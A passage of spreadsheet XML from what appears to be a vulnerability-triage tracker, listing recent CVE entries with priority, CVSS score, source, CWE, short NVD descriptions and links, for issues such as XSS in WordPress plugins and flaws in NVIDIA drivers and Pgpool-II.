        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97237</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97250</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in  Geo Mashup &lt;= 1.13.21 versions.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97250</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97253</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreatura LayerSlider allows Reflected XSS.
This issue affects LayerSlider: from n/a through 8.4.0.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97253</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97271</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPFunnels &lt;= 3.13.1 versions.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97271</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97272</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Premmerce Permalink Manager for WooCommerce &lt;= 2.3.13 versions.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97272</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97289</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Quiz And Survey Master &lt;= 11.2.6 versions.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97289</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97290</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others &lt;= 3.36 versions.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97290</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102127</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>An XML parser used by Kiteworks Email Protection Gateway did not restrict external entity references. Where an optional, non-default message-processing feature is enabled, a remote and unauthenticated sender could potentially use a crafted message to read files accessible to the gateway service account, including cryptographic key material and credentials, and have them sent to a destination they control.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102127</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47582</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47582</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47596</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can write to read-only memory because the memory's permissions are not preserved. A successful exploit of this vulnerability might lead to code execution and escalation of privileges.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47596</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47598</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the open-source kernel module event delivery path where an unprivileged local user could cause a use-after-free through a race between asynchronous event delivery and file close. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47598</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93495</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Improper initialization in an ASUS certain motherboard allows an physically proximate user to read or write arbitrary memory by inserting a specially crafted device.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93495</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100275</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 stored XSS in the workflow error notification toast was possible</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100275</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92868</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>An improper certificate validation vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to bypass client certificate authentication.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92868</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92873</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>Pgpool-II contains an incorrect implementation of an authentication algorithm, which may allow an unauthenticated attacker to promote an arbitrary watchdog node to the leader node.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92873</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93462</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>A missing authentication for critical function vulnerability exists in baserCMS. If this vulnerability is exploited, a remote attacker may obtain sensitive information.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93462</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96342</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Amauri.IO WPMobile.App wpappninja allows Retrieve Embedded Sensitive Data.This issue affects WPMobile.App: from n/a through 11.83.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96342</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10726</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>2505284f-8ffb-486c-bf60-e19c1097a90b</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-73</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Cato Windows SDP Client before version 6.12.6 contains an arbitrary file disclosure vulnerability. A low-privileged local user can cause the Windows service, running as Local System, to read and disclose arbitrary local files due to improper file path validation and missing TLS certificate enforcement.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10726</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96824</t>
